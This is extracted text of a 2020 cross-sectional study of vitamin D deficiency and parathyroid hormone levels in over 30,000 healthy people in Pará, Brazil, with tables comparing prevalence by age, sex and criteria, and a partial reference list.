https://doi.org/10.1016/0304-4165(79)90371-4 10.1053/meta.2002.34052 https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com Abstract Introduction Methods Study A: Patients and trial design Study B: Patients and trial design Laboratory analyses Statistical analysis Results Baseline characteristics Baseline copeptin levels Effect of IL-1 receptor antagonism on copeptin levels Discussion Declaration of interest Funding Financial support Acknowledgements References work_lbtgversgrfo3gnzobsayr36ti ---- 9:7 667–675N Neves Marques de Queiroz et al. Vitamin D and PTH: a cross-sectional study RESEARCH Vitamin D and PTH: data from a cross-sectional study in an equatorial population Natércia Neves Marques de Queiroz, Franciane Trindade Cunha de Melo, Fabrício de Souza Resende, Luísa Corrêa Janaú, Norberto Jorge Kzan de Souza Neto, Manuela Nascimento de Lemos, Ana Carolina Lobato Virgolino, Maria Clara Neres Iunes de Oliveira, Angélica Leite de Alcântara, Lorena Vilhena de Moraes, Tiago Franco David, Wanderson Maia da Silva, Scarlatt Souza Reis, Márcia Costa dos Santos, Ana Carolina Contente Braga de Souza, Pedro Paulo Freire Piani, Neyla Arroyo Lara Mourão, Karem Mileo Felício, João Felício Abrahão Neto and João Soares Felício University Hospital João de Barros Barreto, Federal University of Pará, Endocrinology Division, Belem, Pará, Brazil Correspondence should be addressed to J S Felício: felicio.bel@terra.com.br Abstract Objective: Investigate the prevalence of vitamin D deficiency in an equatorial population through a large-sample study. Methods: Cross-sectional study with 30,224 healthy individuals from the North Region, in Brazil (Amazônia – state of Pará), who had 25-hydroxy-vitamin D (25(OH)D) and intact parathyroid hormone (PTH) serum levels measured by immunoassay method. Those with history of acute or chronic diseases were excluded. Abnormal levels of calcium, creatinine, glycemia and albumin were also exclusion criteria. Results: 25(OH)D levels were 29.1 ± 8.2 ng/mL and values <12.7 ng/mL were equal to < −2 s.d. below average. Hypovitaminosis D was present in 10% of subjects according to the Institute of Medicine (values <20 ng/mL) and in 59%, in consonance with Endocrine Society (values 20–30 ng/mL as insufficiency and <20 ng/mL as deficiency) criteria. Individuals were divided according to four age brackets: children, adolescents, adults and elderly, and their 25(OH)D levels were: 33 ± 9; 28.5 ± 7.4; 28.3 ± 7.7; 29.3 ± 8.5 ng/mL, respectively. All groups differed in 25(OH)D, except adolescents vs adults. Regression model showed BMI, sex, living zone (urban or rural) and age as independent variables to 25(OH)D levels. Comparing subjects with vitamin D deficiency (<20 ng/mL) to those with vitamin D insufficiency (20–30 ng/mL), a difference between PTH levels in these two groups was observed (95.9 ± 24.7 pg/mL vs 44.2 ± 64.5 pg/mL; P < 0.01). Additionally, the most accurate predictive vitamin D level for subclinical hyperparathyroidism in ROC curve was 26 ng/mL. Conclusion: Our equatorial population showed low prevalence of vitamin D hypovitaminosis ranging with age bracket. The insufficient category by Endocrine Society was corroborated by our PTH data. Introduction The Institute of Medicine (IOM) defines normality of vitamin D as serum 25-hydroxy-vitamin D (25(OH)D) levels above 20 ng/mL, based on the dietary intake needed to meet the requirements for at least 97.5% of the population (1). According to this criterion, several studies worldwide have shown high rates of hypovitaminosis D, with an estimate of 30–40%, in European, Asian, African and South American countries (2, 3, 4). Therefore, hypovitaminosis D has been listed as a public health problem, as one billion people presented 25(OH)D -20-0206 Key Words f epidemiology f endocrinology f hypovitaminosis D f vitamin D Endocrine Connections (2020) 9, 667–675 ID: 20-0206 9 7 This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access mailto:felicio.bel@terra.com.br https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com N Neves Marques de Queiroz et al. Vitamin D and PTH: a cross-sectional study 668 PB–XX 9:7 deficiency (4), with a prevalence ranging from 2 to 90%, depending on cut-off points and selected population (5). In addition, Manson et al. (6), in 2016, in a re-analysis of IOM data, suggested there was an overestimation in the diagnosis of hypovitaminosis D and believed that sufficiency is reached when serum vitamin D is above 12.5 ng/mL. Bouillon (7), in a review, stated that all guidelines are unanimous in recommending avoidance of 25(OH)D levels below 10 ng/mL, as well as highlighted the controversy involving levels between 10 and 20 ng/mL, which might not indicate deficiency necessarily for the whole population. Besides the global controversy, large population studies trying to evaluate vitamin D levels in equatorial populations are rare. Little data are available from a small number of locations such as Kenya, DR Congo and Colombia (2, 8). In Brazil, few studies have been carried out to demonstrate the hypovitaminosis D prevalence in healthy subjects. Therewithal, given the country’s length, there is considerable climatic difference between the regions and, as far as we are aware, there is no previous study in the Amazonian region. Therefore, it remains unclear whether the current diagnostic criterion for vitamin D deficiency might cause overdiagnosis of this condition. In this context, investigating the prevalence of vitamin D deficiency in an equatorial population, such as ours, through a large-sample study becomes meaningfully important. Method Study design and data collection A cross-sectional study was performed to evaluate serum levels of 25(OH)D, intact PTH and ionized calcium. All our subjects lived in the state of Pará (coordinates: 3.95°S 53.09°W), located in the North Region of Brazil (Fig. 1). Being near the Equator, Pará constantly experiences hot climate and humid weather with little seasonal variation, as do most equatorial areas, which is the reason we did not include seasonality in this study (9). Usual UV index throughout the year ranges from 8 to 10, being classified as ‘very high’, based on World Health Organization (WHO) criteria (10, 11). Total mean insolation is 2241.6 h/year and total mean irradiation is 5.05 kWh/m2 day (12, 13). Data were collected from January to December 2019. A total of 30,224 subjects of both sexes and different age groups who had 25(OH)D serum levels measured at a local laboratory service from January to December of 2019 were included in the study. All subjects answered a questionnaire; those with previous history of acute or chronic diseases (hypertension, chronic kidney failure, chronic liver disease, autoimmune diseases) were excluded, as well as pregnant women and those taking any medications, including patients who supplemented vitamin D. Subjects who presented abnormal results of serum ionized calcium, creatinine, glycemia and serum albumin were also not eligible (reference values: 1.1–1.3 mmol/L, 0.7–1.3 mg/dL (men) and 0.6–1.1 mg/dL (women), 3.2–4.8 g/dL, respectively). Individuals who had both vitamin D and PTH collected were divided into a smaller group of 1629 healthy individuals and were analyzed separately, in order to properly interpret their data. Information regarding age, sex, BMI and living zone were collected. Patients were divided according to the age groups defined by WHO, in 2013, as children (0–9 years old), teenagers (10–19 years old), adults (20–59 years old) and elderly (above 60 years old). The impact of seasonality was not evaluated because there are not established patterns of seasons in our region (14, 15). This study was approved by University Hospital João de Barros Barreto Ethics Committee, CAAE number 66977717.8.0000.0017. Assay Individuals’ blood was collected and, then, serum 25(OH)D was measured quantitatively by the following kit: DiaSorin LIAISON 25-OH-Vitamin D TOTAL Figure 1 State of Pará (North Region, Brazil). This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com N Neves Marques de Queiroz et al. Vitamin D and PTH: a cross-sectional study 6699:7 chemiluminescence immunoassay (DiaSorin, Stillwater, MN, USA) (16). DiaSorin LIAISON is one of the methods to evaluate 25(OH)D tested by DEQAS (Vitamin D External Quality Assessment Scheme), the largest specialist external quality assessment (proficiency testing) scheme for the vitamin D metabolites 25(OH)D and 1,25(OH)2D, thus reinforcing the accuracy of our analysis (17). Quantitative serum intact parathyroid hormone (PTH) was determined by electrochemiluminescence (Modular Analytics, E170, Roche). Serum albumin was assessed by enzymatic methodology. Concentration of plasmatic glucose was determined by the hexokinase method. Creatinine was measured through kinetic alkaline picrate assays. Ionized calcium was calculated based on total calcium, protein and albumin. Statistical analysis Vitamin D was tested for its normal distribution through the Kolmogorov–Smirnov test. The mean and the s.d. of 25(OH)D levels were calculated. To establish correlations between 25(OH)D levels and variables such as sex, age, BMI and living zone (urban or rural), Pearson or Spearman tests were used. Stepwise multiple regression analysis and simple linear regression were also performed to evaluate the degree of influence of other variables in serum 25(OH)D levels. The SPSS Statistics 22® (IBM Corp.) and RStudio IDE (RStudio, Inc.) software were used for quantitative statistical analysis. The P value <0.05 was considered statistically significant. As for the subjects dosed for intact PTH, a receiver operating characteristic (ROC) curve was constructed to determine the most accurate vitamin D level to predict subclinical hyperparathyroidism (SHT). The cut-off point with maximum sensitivity and specificity in the ROC curve was defined as the minimum value in the equation ((1 − sensitivity)2 + (1 − specificity)) and the precision was estimated based on the area under the ROC curve. Results In our study, 30,224 individuals of both sexes and different age groups were analyzed. The age of the subjects was 40.4 ± 21.4 years, ranging from 0 to 104 (42 ± 20.4 in females vs 36 ± 23.5 in males, P < 0.001) and BMI was 25.6 ± 5.2 kg/m2. Regarding sex, 22,325 (74%) were female and 7899 (26%) were male. They were divided into four age groups: children (0–9 years old), adolescents (10–19), adults (20–59) and elderly (≥60). In our study, there were 3801 (12.6%) children, 2150 (7.1%) adolescents, 18,320 (60.6%) adults and 5953 (19.7%) elderly. 25(OH) D levels were 29.1 ± 8.2 ng/mL and values <12.7 ng/mL were equal to < −2 s.d. below average. All groups differed in age and BMI, as shown in Table 1. Regarding the distribution of vitamin D levels according to each age bracket in our population, all groups differed between one another, except adolescents vs adults (Fig. 2 and Table 1). Furthermore, regarding sex, 25(OH)D levels were higher in males in all groups (Table 2). Only 324 subjects (1%) were below −2 s.d. The median (25th–75th percentile) was 28.3 ng/mL (23.7–33.5). Hypovitaminosis D was present in 10% (3140) of subjects according to the Institute of Medicine (in which abnormal values are those <20 ng/mL) and in 59% (17,847), in consonance with Endocrine Society (which defines values between 20 and 30 ng/mL as insufficiency and values <20 ng/mL as deficiency) criteria. The prevalence of hypovitaminosis D around the world and in our population (according to age groups) is summarized in Tables 3 and 4. The subjects were from 107 different cities in the state of Pará and those living in urban areas showed lower 25(OH)D levels when compared to those living in rural areas (30.3 vs 28.7 ng/mL, P < 0.001). The levels of 25(OH)D correlated with BMI (r = −0.2; P < 0.001) and age (r = −0.1; P < 0.01). Our forward stepwise regression model showed BMI, sex, living zone and age as independent variables to 25(OH)D levels (B = −0.271 (CI: −0.290 to −0.252), r2 = 0.023, P < 0.001; B = 2.911 (CI: 2.697–3.126), r2 = 0.023, P < 0.001; B = −1.763 (CI: −2.057 to −1.468), r2 = 0.005, P < 0.001; B = 0.019 (CI: 0.014–0.024), Table 1 Clinical and laboratory characteristics according to age groups. Children Adolescents Adults Elderly Pn=3801 n=2150 n=18,320 n=5953 Age (years) 6.4 ± 3.3 16 ± 2.3 40.3 ± 10.7 71.1 ± 8.5 <0.001a Sex (F/M) (%) 52/48 66/34 79/21 75/25 <0.001a 25(OH)D (ng/mL) 33 ± 9 28.5 ± 7.4 28.3 ± 7.7 29.3 ± 8.5 <0.001b BMI (kg/m2) 19 ± 4.6 22.8 ± 4.7 26.5 ± 4.6 26.8 ± 4.6 <0.001a aP < 0.05 between all groups. bP < 0.05 between all age groups except adults vs adolescents (P = 0.182). This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com N Neves Marques de Queiroz et al. Vitamin D and PTH: a cross-sectional study 670 PB–XX 9:7 r2 = 0.002, P < 0.001). These variables showed a poor prediction power, altogether being capable of determining only 5.4% of 25(OH)D levels. An inclination coefficient of −0.235 was obtained using BMI and vitamin D level as variables in a simple linear regression model according to the formula vitamin D level = 35.002 − (0.235 × BMI), which suggests that, for each BMI unit gained, there would be a decrease of 0.235 ng/mL in vitamin D levels. The 1692 subjects who had PTH analyzed were divided into two subgroups according to 25(OH)D levels: subgroup 1 (<20 ng/mL) and subgroup 2 (20–30 ng/mL). A difference between PTH levels in these two groups was observed (95.9 ± 24.7 pg/mL vs 44.2 ± 64.5 pg/mL; P < 0.01). The proportion of individuals with abnormal PTH, in subjects with vitamin D deficiency or insufficiency according to Endocrine Society, is presented in Fig. 3. In addition, the percentage of functional hypoparathyroidism (hypovitaminosis D with normal PTH levels) among patients with vitamin D insufficiency (20–30 ng/mL) and deficiency (<20 ng/mL) was 91.7% and 77.2%, respectively (P < 0.01). According to the ROC curve, the vitamin D value established as the cut-off point for PTH response to vitamin D insufficiency and, in consequence, for increased risk of bone loss, in our sample was 26 ng/mL, with sensitivity of 54.8%, specificity of 63.2% and accuracy of 58.5%. The ROC curve also presented accuracy of 58.5%, positive likelihood ratio of 1.49 and negative likelihood ratio of 0.72. In addition, we found that in 152 (9%) of our 1692 individuals who had PTH analyzed showed subclinical hyperparathyroidism. Discussion Our study showed low prevalence of hypovitaminosis D, ranging with age bracket, when compared to other countries, according to both IOM and Endocrine Society (ES) criteria, even when compared to other equatorial populations. In addition, the insufficient category by ES was corroborated by our PTH data. Currently, due to laboratory assays and the variability of their cut-off points, 25(OH)D levels above 30 ng/mL are accepted as appropriate by Endocrine Society, once this value would ensure a satisfactory action with no toxicity risk. In 2011, ES defined values between 20 and 30 ng/mL as insufficiency and values <20 ng/mL as deficiency (18). IOM, based on the dietary intake needed to meet the requirements of the population, established vitamin D deficiency as levels <20 ng/mL (19, 20). They also suggest that each population should establish their specific criteria to decide about 25(OH)D supplementation. Nevertheless, Manson et al. (6), while assessing data from the National Health and Nutrition Examination Survey (NHANES), suggested <12.5 ng/mL as a cut-off. If Manson’s proposition were used in our population, prevalence of vitamin D hypovitaminosis would be extremely low compared to other countries in the equatorial zone (2, 8). Therefore, it could indicate that specific population factors, such as latitude and mean insolation, might be of great importance to determine serum levels of 25(OH)D. In Brazil, few population studies address this aspect. Unger (21) performed a transversal study in São Paulo, evaluating 603 volunteers aged 18–90 years in 2007. The author found that 77.4% of the participants showed vitamin D insufficiency and 19.3% showed 25(OH)D deficiency. Scalco et al., in a research with 102 noninstitutionalized seniors, found that the prevalence of vitamin D hypovitaminosis was higher (87.5%) (22). Finally, Linhares et al. studying 226 children at Recife, Figure 2 25(OH)D distribution according to age bracket. Table 2 25(OH)D levels (ng/mL) according to sex, separated into age groups. Age/sex n Male Female P General 30,224 31.2 ± 8.8 28.3 ± 7.8 <0.001 Children 3801 34 ± 9.3 32 ± 8.7 <0.001 Adolescents 2150 30.1 ± 7.9 27 ± 6.9 <0.001 Adults 18,320 29.8 ± 8.3 27.9 ± 7.5 <0.001 Elderly 5953 32.2 ± 9.1 28.4 ± 8.1 <0.001 This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com N Neves Marques de Queiroz et al. Vitamin D and PTH: a cross-sectional study 6719:7 Brazil, did not find cases of vitamin D deficiency (23). All those studies used Endocrine Society parameters of normality. The first two studies occurred in the South-Southeast region of Brazil (22°–33° S), with lower mean insolation, which could justify the higher hypovitaminosis D prevalence compared to our data. The third study, which evaluated just a selected children population, found no case of hypovitaminosis D and occurred in the Northeast region of Brazil, in a city with latitude close to ours. Those last findings suggest that latitude, mean insolation and age must be considered when establishing normal vitamin D values in a population, which reinforces our findings about age bracket influence on vitamin D. In addition, we found higher levels of 25(OH)D in males. One possible explanation would be a greater sun exposure of the thorax – which is a region of better absorption of 25(OH)D. Our results are in agreement with the findings of Al-Ghamdi (24) and Kiani et al. (25). The former evaluated 150 subjects from Saudi Arabia and observed vitamin D lower in girls, probably because of their dressing costumes. In Amazonia, due to the hot weather, men usually dress shirtless and, consequently, have a higher thorax exposure. Another hypothesis would be the influence of testosterone levels. It has been suggested that testosterone levels could be associated with higher 25(OH)D levels (26, 27, 28, 29). In fact, Araujo et al. also described vitamin D levels higher in males than in females, also suggesting this hormonal influence (30). A possible mechanism that could explain this association is not well established. Our data also showed a decrease in circulating concentrations of serum 25(OH)D while BMI increased, which indicates that poor vitamin D levels are linked with higher BMI. The proposed mechanisms to explain this include a lack of sun exposure, modified vitamin D Table 3 Prevalence of 25(OH)D deficiency in different countries. Reference Country n Age range Prevalence <12 ng/mL (Munns et al. (37)) Prevalence <20 ng/mL (IOM) Prevalence <30 ng/mL (ES) Queiroz et al. (2020) North Brazil 30,224 0–104 0.8% 10.3% 59% Mogire et al. (2019) Africa countries 21,474 0–90 18.5% 34.2% 59.5% Cashman et al. (2016) Europe 55,844 1–99 13% 40.4% – Eloi et al. (2016) Southeast Brazil (São Paulo) 39,004 2–95 – 33.9% 70.7% Kiani et al. (2015) Pakistan 500 1.6–92 – – 87.6% Ramnemark et al. (2015) Northern Sweden 1622 25–74 – 20.8% – Gill et al. (2014) Northeast Australia 2413 24–95 – 22.7% – Unger et al. (2010) Southeast Brazil (São Paulo) 603 18–90 – – 78% ES, Endocrine Society; IOM, Institute of Medicine. Table 4 Prevalence of vitamin D deficiency in our population according to different criteria. Vitamin D cut-offs (ng/mL) <12 (Munns et al. (56)) <20 (IOM) <30 (ES) Children (%) n=3801 0.1 4.5 40.9 Adolescents (%) n=2150 0.8 12.2 64.2 Adults (%) n=18,320 0.9 11.3 62.9 Elderly (%) n=5953 1.1 10.5 57.0 Total (%) n=30,224 0.8 10.4 59.0 Figure 3 Distribution of patients with secondary hyperparathyroidism according to vitamin D status (Endocrine Society). This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com N Neves Marques de Queiroz et al. Vitamin D and PTH: a cross-sectional study 672 PB–XX 9:7 activation and increased vitamin D storage in adipose tissue (18, 31, 32). Indeed, obese individuals expose themselves less to solar UV radiation, diminishing cutaneous synthesis of vitamin D3 from 7-dehydrocholesterol (32). It was showed, in a study with obese patients, a higher prevalence of hypovitaminosis in this group, as none of them had the habit of sunbathing. Their clothes used to cover as much skin as possible, generating the hypothesis that low concentrations of vitamin D may be related to low sun exposure in those patients (32). Eloi et al. (33), in a similar research in São Paulo, based on the ES, performed an investigation in patients aged from 2 to 95 years, and observed vitamin D concentrations <20 ng/mL in 33.9% of the patients, presenting higher vitamin D levels in summer (38.4%) when compared to winter (23.3%). In our study, it was not possible to assess this issue, due to the lack of proper season distinction in the state of Pará, which is situated near the Equator line presenting higher insolation throughout the year. Our study showed that people living in rural areas have higher vitamin D levels. This finding agrees with a meta-analysis that took place in African countries recently (2). However, it remains a controversial topic. Fang et al. (34), in a study based in China, with 1814 subjects, showed slightly higher vitamin D levels among urban residents compared to rural ones, but also pointed out that its results are opposed to many similar researches in Asia (35, 36, 37, 38). Similarly, an Indian study demonstrated lower 25(OH)D levels in rural subjects despite plentiful sun exposure (39). In our region, the dressing habits of countryside inhabitants, such as using lighter and fewer clothes, and the fact that rural areas have less impairment of sun exposure due to shorter buildings could influence our results. In fact, KimLi et al. (40) established skin exposure as the single strongest contributor to the explained variance in 25(OH)D. However, this issue needs to be better analyzed. The variables studied in our regression model showed a low predictive power, being capable of determining only 5.4% of 25(OH)D levels. An important hypothesis that could explain these findings is the assessment of polymorphism consequences for the vitamin D receptor (VDR) function. This individual genetic diversity could play a central role in determining 25(OH)D levels (41, 42, 43, 44). According to Nissen (45), who analyzed twenty- five different genetic variants in seven different genes, it was concluded that polymorphisms in the CYP2R1 and GC genes are associated with serum variations in the vitamin D. In this same perspective, Husain et al. (46), who compared Americans with European and African ancestry with similar lifestyles and demographic conditions, demonstrated that those with African ancestry had lower 25(OH)D values. Both studies suggest that specific ethnic and genetic determinants may influence vitamin D levels. In Brazil, the expressive miscegenation makes ethnic analysis difficult. This could explain the difference between hypovitaminosis D prevalence in our study when compared to those from the rest of the world. Analyzing the ROC curve in this study, we found that vitamin D level of 26 ng/mL is the best cut-off point for the PTH response to vitamin D insufficiency and, consequently, for increased risk of bone loss. It suggests that subjects with vitamin D levels lower than 26 ng/mL could have an additional benefit in supplementation, since a large number of people who fit in this condition are asymptomatic to SHP. According to ES definitions, this value is classified as insufficiency, reinforcing that this group of individuals should receive special attention in clinical practice. Another aspect that should be addressed is the method for assessing vitamin D. Liquid chromatography– mass spectrometry is considered the gold standard for measuring 25(OH)D. It has the advantage of allowing sample adaptation and high specificity; however, it is a complex, expensive and rarely available assay (47). The automated immunoassay is the most widely used method globally, standardized in clinical practice, as it is easier to perform, faster and less costly (47, 48). In our study, aiming at the clinical applicability of the findings, the automated immunoassay was used. In Brazil, low vitamin D intake is commonly observed. Filgueiras et al. (49) found an elevated prevalence of inadequate vitamin D intake (91.3 %) among 378 children. Peters et al. (50), studying 136 adolescents, and Cembranel et al. (51), assessing 1051 patients between 22 and 63 years, described that 85.1% and 100% of subjects did not meet the daily adequate intake recommendation of vitamin D. In 2013, a National Dietary Survey with Brazilian elderly stated that our region had more adequate levels of vitamin D intake when compared to other regions of Brazil, even though inadequacy was still very present (52). This might contribute to the lower prevalence of vitamin D hypovitaminosis in our population. Skin pigmentation also might have an influence in vitamin D levels. Libon et al. (53), in a research with Fitzpatrick skin types II, III (fair-skinned) and VI (black- skinned) individuals, found that after a single total body UVB exposure fair-skinned people presented higher levels of vitamin D when compared to black-skinned people. In agreement, a systematic review conducted by This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com N Neves Marques de Queiroz et al. Vitamin D and PTH: a cross-sectional study 6739:7 Xiang et al. (54) concludes that vitamin D production was less effective in those with pigmented skin. In the North region of Brazil, black people correspond solely to 6.5% of the population (55). This also might have influenced our results. In fact, as a limitation of our study, we did not consider the amount of time of exposure to sunlight, skin type and vitamin D daily dietary intake, which are known as important factors impacting serum vitamin D levels. Finally, the low prevalence of hypovitaminosis D in our population was established by IOM criteria of 20 ng/mL, using data from our 30,224 subjects who performed 25(OH)D serum dosage. On the other hand, the value of 26 ng/mL resulted from a ROC curve constructed to determine the most accurate vitamin D level to predict subclinical hyperparathyroidism, which should be considered for treatment in risk groups for bone mass loss, for example. However, it would not be a general population cut-off point. Conclusion Our equatorial population showed low prevalence of vitamin D hypovitaminosis, according to both IOM (<20 ng/mL) and ES criteria (<30 ng/mL), ranging with age bracket. The insufficient category by Endocrine Society was corroborated by our PTH data. Since our regression model could only determine 5.4% of the vitamin D levels, the individual characteristics of each subject should be taken into account to establish inadequate levels of vitamin D. Declaration of interest The authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. Funding This work did not receive any specific grant from any funding agency in the public, commercial, or not-for-profit sector. Ethics approval and consent to participate Our study was approved by the Human Research Ethics Committee. The Committee waived the requirement for written informed consent for participants in this study in accordance with the national legislation, resolution 466/12 (National Health Council) and the institutional requirements due to the fact that it is a database population study with confidentiality and non-identification guarantee. Consent for publication All authors approved the manuscript and consent to this submission. Availability of data and material The datasets analyzed during the current study are available from the corresponding author on reasonable request. Author contribution statement All persons who meet authorship criteria are listed as authors, and all authors certify that they have participated sufficiently in the work to take public responsibility for the content, including participation in the concept, design, analysis, writing, or revision of the manuscript. K M F, J S F and N N M Q took part in conception and design of study. A L A, L V M, T F D, N A L M, W M S and A C C B S were responsible for acquisition of data, while L C J, J S F, S S R, N J K S N, P P F P and J F A N have done the analysis and interpretation of data. M N L, A C L V, F T C M, F S R, L M C F and M C N I O have drafted the manuscript together. All authors have revised the manuscript critically and approved the version to be published. Acknowledgements The authors thank Amaral Costa Laboratory and Programa de Pós Graduação em Oncologia e Ciências Médicas of HUJBB for their contribution to the research. References 1 Maeda SS, Borba VZC, Camargo MBR, Silva DMW, Borges JLC, Bandeira F, Lazaretti-Castro M & Brazilian Society of Endocrinology and Metabology (SBEM). Recommendations of the Brazilian Society of Endocrinology and Metabology (SBEM) for the diagnosis and treatment of hypovitaminosis D. Arquivos Brasileiros de Endocrinologia e Metabologia 2014 58 411–433. (https://doi.org/10.1590/0004-2730000003388) 2 Mogire RM, Mutua A, Kimita W, Kamau A, Bejon P, Pettifor JM, Adeyemo A, Williams TN & Atkinson SH. Prevalence of vitamin D deficiency in Africa: a systematic review and meta-analysis. Lancet: Global Health 2020 8 e134–e142. (https://doi.org/10.1016/S2214- 109X(19)30457-7) 3 Cashman KD, Dowling KG, Škrabáková Z, Gonzalez-Gross M, Valtueña J, De Henauw S, Moreno L, Damsgaard CT, Michaelsen KF, Mølgaard C, et al. Vitamin D deficiency in Europe: pandemic? American Journal of Clinical Nutrition 2016 103 1033–1044. (https:// doi.org/10.3945/ajcn.115.120873) 4 Holick MF. The vitamin D deficiency pandemic: approaches for diagnosis, treatment and prevention. Reviews in Endocrine and Metabolic Disorders 2017 18 153–165. (https://doi.org/10.1007/ s11154-017-9424-1) 5 Hilger J, Friedel A, Herr R, Rausch T, Roos F, Wahl DA, Pierroz DD, Weber P & Hoffmann K. A systematic review of vitamin D status in populations worldwide. British Journal of Nutrition 2014 111 23–45. (https://doi.org/10.1017/S0007114513001840) 6 Manson JE, Brannon PM, Rosen CJ & Taylor CL. Vitamin D deficiency – is there really a pandemic? New England Journal of Medicine 2016 375 1817–1820. (https://doi.org/10.1056/ NEJMp1608005) 7 Bouillon R. Comparative analysis of nutritional guidelines for vitamin D. Nature Reviews: Endocrinology 2017 13 466–479. (https:// doi.org/10.1038/nrendo.2017.31) 8 Hernando VU, Andry MM, María Virginia PF & Valentina A. Vitamin D nutritional status in the adult population in Colombia – an analytical cross-sectional study. Heliyon 2020 6 e03479. (https://doi. org/10.1016/j.heliyon.2020.e03479) 9 National Geographic. Equator. Washington, DC, USA: National Geographic. (available at: https://www.nationalgeographic.org/ encyclopedia/equator/) This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://doi.org/10.1590/0004-2730000003388 https://doi.org/10.1016/S2214-109X(19)30457-7 https://doi.org/10.1016/S2214-109X(19)30457-7 https://doi.org/10.3945/ajcn.115.120873 https://doi.org/10.3945/ajcn.115.120873 https://doi.org/10.1007/s11154-017-9424-1 https://doi.org/10.1007/s11154-017-9424-1 https://doi.org/10.1017/S0007114513001840 https://doi.org/10.1056/NEJMp1608005 https://doi.org/10.1056/NEJMp1608005 https://doi.org/10.1038/nrendo.2017.31 https://doi.org/10.1038/nrendo.2017.31 https://doi.org/10.1016/j.heliyon.2020.e03479 https://doi.org/10.1016/j.heliyon.2020.e03479 https://www.nationalgeographic.org/encyclopedia/equator/ https://www.nationalgeographic.org/encyclopedia/equator/ https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0206 https://ec.bioscientifica.com N Neves Marques de Queiroz et al. Vitamin D and PTH: a cross-sectional study 674 PB–XX 9:7 10 NASA earth observations. UV index. Greenbelt, MD, USA: NEO. (available at: https://neo.sci.gsfc.nasa.gov/view. php?datasetId=AURA_UVI_CLIM_M) 11 World Health Organization. Ultraviolet (UV) index. Geneva Switzerland: WHO, 2017. (available at: https://www.who.int/news- room/q-a-detail/ultraviolet-(uv)-index) 12 National Institute of Meteorology. Meteorological database for teaching and research. Brasília, Brasil: INMET. (available at: http:// www.inmet.gov.br/portal/index.php?r=bdmep/bdmep) 13 National Space Research Institute. Solar and terrestrial radiation. São José dos Campos, Brazil: DSA. (available at: http://satelite.cptec. inpe.br/radiacao/) 14 Machado LAT, Laurent H, Dessay N & Miranda I. Seasonal and diurnal variability of convection over the Amazonia: a comparison of different vegetation types and large scale forcing. Theoretical and Applied Climatology 2004 78 61–77. (https://doi.org/10.1007/s00704- 004-0044-9) 15 Nobre CA, Obregón GO, Marengo JA, Fu R & Poveda G. Characteristics of Amazonian climate: main features. In Geophysical Monograph Series, 149–157. Eds M Keller, M Bustamante, J Gash & PS Dias. Washington, DC, USA: American Geophysical Union, 2009. (https://doi.org/10.1029/2008GM000720). 16 DiaSorin. LIAISON 25 OH vitamin D TOTAL Assay [Brochure]. Stillwater, MN, USA: DiaSorin. (available at: https://www.diasorin. com/en/node/8476) 17 DEQAS. Vitamin D External Quality Assessment Scheme. DEQAS Review 2016/2017. London, UK: DEQAS. (available at: http://www. deqas.org/downloads/DEQAS%20Review%20October%202017.pdf) 18 Holick MF, Binkley NC, Bischoff-Ferrari HA, Gordon CM, Hanley DA, Heaney RP, Murad MH, Weaver CM & Endocrine Society. Evaluation, treatment, and prevention of vitamin D deficiency: an Endocrine Society clinical practice guideline. Journal of Clinical Endocrinology and Metabolism 2011 96 1911–1930. (https://doi.org/10.1210/jc.2011- 0385) 19 Institute of Medicine (IOM). Dietary reference intakes for calcium and vitamin D. Pediatrics 2012 130 e1424. (https://doi.org/10.1542/ peds.2012-2590) 20 Ross AC, Manson JE, Abrams SA, Aloia JF, Brannon PM, Clinton SK, Durazo-Arvizu RA, Gallagher JC, Gallo RL, Jones G, et al. The 2011 report on dietary reference intakes for calcium and 